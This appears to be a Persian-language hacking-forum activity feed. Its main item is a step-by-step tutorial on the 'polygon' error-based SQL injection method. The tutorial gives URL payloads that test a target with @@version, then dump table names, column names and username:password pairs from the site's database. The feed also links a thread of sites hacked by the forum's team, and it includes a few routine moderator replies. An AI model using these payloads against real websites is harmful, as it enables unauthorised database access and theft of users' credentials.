می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید.
و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است )
----------------------------------------
امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم
برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم .
هر گونه سوال در مورد پست داشتید بپرسید .
********* MR.MSA **********
This is the hidden content, please ورود یا ثبت نام -
MR.MSA از johnjones یک واکنش گرفت در آموزش متد polygon در sql injection
با سلام خدمت کاربران و مدیران انجمن گارد ایران
من MR.MSA
در این پست قصد دارم متد polygon رو به شما آموزش بدهم .
------------------------------------
یکی از کاربرد های متد polygon زمانی است که :
در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید
و بعد خواستید تیبل ها را بیرون بکشید و با خطای
error different number of columns
مواجه شدید می توانید از متد polygon استفاده کنید .
یکی دیگر از کاربرد های متد polygon زمانی است که :
با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید .
------------------------------------
سطح متد : حرفه ای
------------------------------------
روش استفاده از متد polygon :
ابتدا مقدار را پاک کنید :
site.com/news.php?id=1
( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . )
--------------
سپس این عبارت را قرار می دهید :
This is the hidden content, please ورود یا ثبت نام polygon((select*from(select*from(select@@version)f)x))
و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید .
یک جورایی میشه گفت جای که version است ستون آسیب پذیره.
--------------
خب حالا می رویم سراغ بیرون کشیدن تیبل ها :
site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x))
قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند .
توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ، پس نگران نباشید 😁)
--------------
(برای مثال تیبل مهمی که بدست می آوریم user است )
و حالا برای بیرون کشیدن ستون های یک جدول :
site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x))
قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن )
اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید .
--------------
و می مونه بیرون کشیدن اطلاعات ستون های مهم :
site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x))
باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید .
اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید .
------------------------------------
امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم
برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم .
هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید .
-
MR.MSA از johnjones یک واکنش گرفت در سوال در رابطه با تگ <textarea> در html
با سلام خدمت شما دوست عزیز
دو نکته خیلی مهم !!!!
۱- نام کاربری خودتون رو به یک چیز مناسب تغییر دهید !
۲- از ارسال سوالات زیاااد در یک تاپیک خودداری کنید !!!! سوالاتتون رو در تاپیک های دیگر با موضوع مخصوص خودش
باز کنید تا برای دیگران راحت تر قابل جست و جو باشد !!!!!
در صورت مشاهده دوباره با شما بر خورد می شود !
با احترام ، موفق و پیروز باشید .
-
MR.MSA از johnjones یک واکنش گرفت در اموزش ساخت ربات تلگرام
با سلام و عرض ادب
دوست عزیز تاپیک برای سایت ۹۸ هست!
احتمالا ایشون تا الان مشکلشون حل شده
و اینکه قرار دادن لینک درست نیست! لطفا قوانین رو مطالعه کنید.
موفق باشید.
-
MR.MSA از johnjones یک واکنش گرفت در سایتهای هک شده توسط تیم امنیتی گارد ایران - Guardiran Security Team
This is the hidden content, please ورود یا ثبت نام
-
MR.MSA از johnjones یک واکنش گرفت در سایتهای هک شده توسط تیم امنیتی گارد ایران - Guardiran Security Team
This is the hidden content, please ورود یا ثبت نام موفق باشید .